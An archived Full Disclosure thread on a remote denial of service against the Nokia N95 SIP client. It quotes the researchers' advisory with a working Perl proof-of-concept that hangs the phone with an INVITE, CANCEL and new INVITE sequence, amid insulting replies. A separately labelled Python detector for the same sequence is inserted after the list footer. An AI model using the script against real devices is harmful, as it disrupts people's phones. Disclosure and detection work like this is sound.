Full Disclosure mailing list archives
Re: Nokia N95 cellphone remote DoS using the SIP Stack
From: nnp <version5 () gmail com>
Date: Wed, 5 Dec 2007 14:10:15 -0800
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think you're missing his point. In fact I might be too, but my take on it is this... you'd think two PhDs and a PhD student might be able to do something a little more advanced than running a fuzzer and reporting DoS conditions. Do you guys even investigate the DoS to determine the root cause? If ye did then that might be OK and considered PhD level. I would think that a PhD-level interpretation of this area might be, for instance... running a fuzzer against a hardware phone and then getting some form of code execution. Yes? No? Maybe?

It looks to me like one of you guys built a VoIP fuzzer (is it even a VoIP fuzzer or just SIP?) and for the remainder of your doctoral studies you will be purchasing equipment and hitting the 'Fuzz' button.

As I said, if you're gonna be submitting this kind of stuff to every list you can, then at least investigate the root cause; maybe then it'll provide some slightly more interesting reading and perhaps benefit your thesis.

nnp
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)
Comment: http://firegpg.tuxfamily.org

iD8DBQFHV5DhbP10WPHfgnQRAtMNAJ43x7ZJDyVn0njZi2zTMQIQQoB6bgCeK8k7
addmL2c5Jm4LrlQvahnBrgY=
=YX4u
-----END PGP SIGNATURE-----

On Dec 5, 2007 11:57 AM, <state () loria fr> wrote:
hi Reepex,

I do not understand why you are frustrated about a computer science degree. Maybe someone got dropped out of a degree program and some psychological trauma gets activated when seeing a Ph.D? Whether you like it or not, in order to get a computer science degree you will have to take classes, and most classes are taught by Ph.Ds. I will not argue with you on why I use the Ph.D in my signature, but if you really want to know, look at our research papers published in academic journals/conferences. (If you do not find them, I can send them to you.) If you ever understand the contents, then you will understand what our credentials are..:) This will probably never happen. At least I use a signature and a real name and do not hide behind a gmail account. Meanwhile, try yourself to find at least one vulnerability and enjoy Perl programming; it seems your computer science skills are somehow in this area :)

Greetings
RS

Selon reepex <reepex () gmail com>:

So almighty Phd, what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'. Does this properly summarize your phd credentials?
I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of'. I am sure you will serve the academic community greatly one day when you teach "hacking" classes revolving around the latest editions of Hacking Exposed.

On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:

Nokia N95 cellphone remote DoS using the SIP Stack

Severity: High – Denial of Service
Hardware: Nokia N95
Firmware: Tested version: Nokia RM-159 V 12.0.013

Notification:
  Vulnerability found: 11 September 2007
  Contact Nokia Support: 12 September 2007 / No reply
  Contact Nokia Security Support: 19 September 2007 / No reply

Vulnerability Synopsis:
If the device has the SIP Phone client activated, a sequence of SIP messages turns the device into an inconsistent state where the user is not able to operate it any more until it reboots. The sequence of messages consists of 2 different SIP dialogs: the first initiates an INVITE transaction but immediately closes it (in an anticipated manner), while the second initiates a normal INVITE transaction that triggers the vulnerability of the target. The sequence of messages is illustrated below.

X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X ------------------------- CANCEL -----------------------> Nokiav12
X <----------------- OK (to the Cancel) ------------------- Nokiav12
X <---------------- 487 Request Terminated ---------------- Nokiav12
                     -------- New Dialog --------
X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X <---------------------- 180 Trying ---------------------- Nokiav12
         ---- The device does not work properly anymore ----

Impact:
A remote entity can take down all the services of the cell phone.

Resolution:
As we did not get any proper reply from Nokia about the subject, the best way will be to disable the SIP Client.

Credits:
  Humberto J. Abdelnur (Ph.D Student)
  Radu State (Ph.D)
  Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA Lorraine, using KiF, the Madynes VoIP fuzzer.
http://madynes.loria.fr/

Proof of Concept:
A perl script (nokiav12.pl) is attached to this mail. Before launching it, the SIP phone has to be initialized in the target device.

Command: perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
E.g.:    perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu

    #!/usr/bin/perl
    ##################################################
    # Vulnerability discovered using KiF ~ Kiph      #
    #                                                #
    # Authors:                                       #
    #   Humberto J. Abdelnur (Ph.D Student)          #
    #   Radu State (Ph.D)                            #
    #   Olivier Festor (Ph.D)                        #
    #                                                #
    # Madynes Team, LORIA - INRIA Lorraine           #
    # http://madynes.loria.fr                        #
    ##################################################
    use strict;
    use warnings;
    use IO::Socket::INET;
    use String::Random;

    die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>\n"
        unless defined $ARGV[3];

    my $targetIP     = $ARGV[0];
    my $targetUser   = $ARGV[1];
    my $attackerIP   = $ARGV[2];
    my $attackerUser = $ARGV[3];

    # UDP socket bound to 5060 so the phone's replies come back to the Via address.
    my $socket = IO::Socket::INET->new(
        Proto     => 'udp',
        PeerPort  => 5060,
        PeerAddr  => $targetIP,
        LocalPort => 5060,
    ) or die "Cannot create socket: $!\n";

    my $foo    = String::Random->new;
    my $callid = $foo->randpattern("CCccnCn");
    my $cseq   = $foo->randregex('\d\d\d\d');

    # Each line ends with "\r" followed by a literal newline, giving the CRLF that SIP and SDP expect.
    my $sdp = "v=0\r
    o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
    s=-\r
    c=IN IP4 $attackerIP\r
    t=0 0\r
    m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
    a=sendrecv\r
    a=ptime:20\r
    a=maxptime:200\r
    a=fmtp:96 mode-change-neighbor=1\r
    a=fmtp:18 annexb=no\r
    a=fmtp:98 0-15\r
    a=rtpmap:96 AMR/8000/1\r
    a=rtpmap:0 PCMU/8000/1\r
    a=rtpmap:8 PCMA/8000/1\r
    a=rtpmap:97 iLBC/8000/1\r
    a=rtpmap:18 G729/8000/1\r
    a=rtpmap:98 telephone-event/8000/1\r
    a=rtpmap:13 CN/8000/1\r
    ";
    my $sdplen = length $sdp;

    # First dialog: INVITE with SDP offer ...
    my $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
    Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
    From: <sip:$attackerUser\@$attackerIP>;tag=1\r
    To: <sip:$targetUser\@$targetIP>\r
    Call-ID: $callid\@$attackerIP\r
    CSeq: $cseq INVITE\r
    Max-Forwards: 70\r
    Contact: <sip:$attackerUser\@$attackerIP>\r
    Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
    Content-Type: application/sdp\r
    Content-Length: $sdplen\r
    \r
    $sdp";
    $socket->send($msg);

    # ... wait until the phone answers with 100 Trying ...
    my $text = '';
    while (not $text =~ /^SIP\/2.0 100(.\r\n)*/) {
        $socket->recv($text, 1024, 0);
    }

    # ... then cancel it straight away (same Call-ID, CSeq number and branch as the INVITE).
    $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
    Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
    From: <sip:$attackerUser\@$attackerIP>;tag=1\r
    To: <sip:$targetUser\@$targetIP>;tag=1\r
    Call-ID: $callid\@$attackerIP\r
    CSeq: $cseq CANCEL\r
    Max-Forwards: 70\r
    Content-Length: 0\r
    \r
    ";
    $socket->send($msg);
    sleep 1;    # pause before opening the second dialog

    # Second dialog: a fresh INVITE with a new Call-ID, CSeq, branch and From tag.
    $callid = $foo->randpattern("CCccnCn");
    $cseq   = $foo->randregex('\d\d\d\d');
    $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
    Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
    From: <sip:$attackerUser\@$attackerIP>;tag=2\r
    To: <sip:$targetUser\@$targetIP>\r
    Call-ID: $callid\@$attackerIP\r
    CSeq: $cseq INVITE\r
    Contact: <sip:$attackerUser\@$attackerIP>\r
    Max-Forwards: 70\r
    Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
    Content-Type: application/sdp\r
    Content-Length: $sdplen\r
    \r
    $sdp";
    $socket->send($msg);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
http://www.smashthestack.org
http://www.unprotectedhex.com
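The INVITE / CANCEL / fresh-INVITE sequence from the advisory above, seen from the defender's side. This is an added example, not code from the original post, from KiF, or from nokiav12.pl: a minimal SIP datagram parser (start line, headers including compact forms, body cut at Content-Length) and a stateful detector that pairs each CANCEL with its INVITE on Call-ID, CSeq number and top Via branch, as RFC 3261 section 9.1 requires, then alerts when the same source follows an early CANCEL with an INVITE for a new dialog. The two time windows, the Call-IDs and the timestamps are assumptions constructed for the demo; the addresses and user names come from the advisory's usage line. Only requests drive the state, so the phone's responses are parsed but otherwise ignored.

```python
"""SIP parser plus detector for the INVITE -> early CANCEL -> fresh INVITE
sequence described in the advisory. Added example; not from the original
post, from KiF, or from nokiav12.pl."""
import re
from dataclasses import dataclass, field

# RFC 3261 section 7.3.3 compact header names that matter here.
COMPACT = {"i": "call-id", "v": "via", "f": "from", "t": "to",
           "m": "contact", "l": "content-length", "c": "content-type"}


@dataclass
class SipMessage:
    method: str    # request method, or "" for a response
    status: int    # response status code, or 0 for a request
    headers: dict  # lower-case name -> first value seen (for "via" that is the top Via)
    body: bytes


def parse_sip(raw: bytes) -> SipMessage:
    """Split one SIP datagram into start line, headers and body (RFC 3261 section 7)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name = COMPACT.get(name.strip().lower(), name.strip().lower())
        if name and name not in headers:
            headers[name] = value.strip()
    try:
        length = int(headers.get("content-length", len(rest)))
    except ValueError:
        length = len(rest)
    body = rest[:length]  # bytes past Content-Length are not part of this message
    start = lines[0].split()
    if start and start[0] == "SIP/2.0":
        return SipMessage("", int(start[1]), headers, body)
    return SipMessage(start[0].upper() if start else "", 0, headers, body)


def via_branch(via: str) -> str:
    """Branch parameter of a Via value; it identifies the transaction (RFC 3261 section 17)."""
    m = re.search(r";branch=([^;,\s]+)", via)
    return m.group(1) if m else ""


@dataclass
class Detector:
    """Tracks INVITE transactions per source and flags the advisory's pattern.
    Both windows are assumptions chosen for this example, not values from the advisory."""
    cancel_window: float = 2.0  # a CANCEL this soon after its INVITE counts as "anticipated"
    invite_window: float = 5.0  # a fresh INVITE this soon after that CANCEL completes the pattern
    pending: dict = field(default_factory=dict)    # (src, call-id, cseq, branch) -> INVITE time
    cancelled: dict = field(default_factory=dict)  # src -> (CANCEL time, call-id)
    alerts: list = field(default_factory=list)

    def feed(self, t: float, src: str, raw: bytes):
        """Consume one datagram (time in seconds, source IP, raw bytes); return an alert or None."""
        msg = parse_sip(raw)
        if msg.status:  # responses come from the phone; only the client's requests drive the pattern
            return None
        call_id = msg.headers.get("call-id", "")
        cseq_num = msg.headers.get("cseq", "").split(" ")[0]
        key = (src, call_id, cseq_num, via_branch(msg.headers.get("via", "")))
        if msg.method == "INVITE":
            prev = self.cancelled.pop(src, None)
            if prev and call_id != prev[1] and t - prev[0] <= self.invite_window:
                alert = {"src": src, "cancelled_call_id": prev[1],
                         "new_call_id": call_id, "time": t}
                self.alerts.append(alert)
                return alert
            self.pending[key] = t
        elif msg.method == "CANCEL":
            # A CANCEL matches its INVITE on Call-ID, CSeq number and top Via branch (RFC 3261 9.1).
            t_invite = self.pending.pop(key, None)
            if t_invite is not None and t - t_invite <= self.cancel_window:
                self.cancelled[src] = (t, call_id)
        return None


def build_request(method, call_id, cseq, branch, src="192.168.1.2", user="tucu",
                  dst="192.168.1.119", dst_user="lupilu") -> bytes:
    """Constructed request in the shape nokiav12.pl sends (addresses from the advisory's usage line)."""
    return (f"{method} sip:{dst_user}@{dst} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src};branch={branch}\r\n"
            f"From: <sip:{user}@{src}>;tag=1\r\n"
            f"To: <sip:{dst_user}@{dst}>\r\n"
            f"Call-ID: {call_id}@{src}\r\n"
            f"CSeq: {cseq} {method}\r\n"
            "Max-Forwards: 70\r\nContent-Length: 0\r\n\r\n").encode()


def run_poc_trace():
    """Constructed capture of the PoC's three requests plus one of the phone's replies."""
    d, src, phone = Detector(), "192.168.1.2", "192.168.1.119"
    d.feed(0.00, src, build_request("INVITE", "AbcdE1f", "1234", "z9hG4bK1"))
    d.feed(0.02, phone, b"SIP/2.0 100 Trying\r\nv: SIP/2.0/UDP 192.168.1.2;branch=z9hG4bK1\r\nl: 0\r\n\r\n")
    d.feed(0.05, src, build_request("CANCEL", "AbcdE1f", "1234", "z9hG4bK1"))
    d.feed(1.05, src, build_request("INVITE", "XyzwQ2r", "5678", "z9hG4bK2"))
    return d.alerts


def run_benign_trace():
    """A caller who lets the phone ring for 8 s, gives up, then redials: no alert."""
    d, src = Detector(), "192.168.1.2"
    d.feed(0.0, src, build_request("INVITE", "Call0001", "10", "z9hG4bKa"))
    d.feed(8.0, src, build_request("CANCEL", "Call0001", "10", "z9hG4bKa"))
    d.feed(9.0, src, build_request("INVITE", "Call0002", "11", "z9hG4bKb"))
    return d.alerts


if __name__ == "__main__":
    print("PoC trace alerts:   ", run_poc_trace())
    print("benign trace alerts:", run_benign_trace())
```

Feeding it real traffic means pulling UDP/5060 payloads out of a capture and calling `feed` with the packet timestamp and source address; the match on CSeq number and branch is what keeps a CANCEL for an unrelated call from being paired with the wrong INVITE, and the short `cancel_window` is what separates the advisory's immediate CANCEL from a user who simply hangs up while the far end is ringing.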
Current thread:
- Nokia N95 cellphone remote DoS using the SIP Stack Radu State (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack nnp (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack Humberto Abdelnur (Dec 06)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)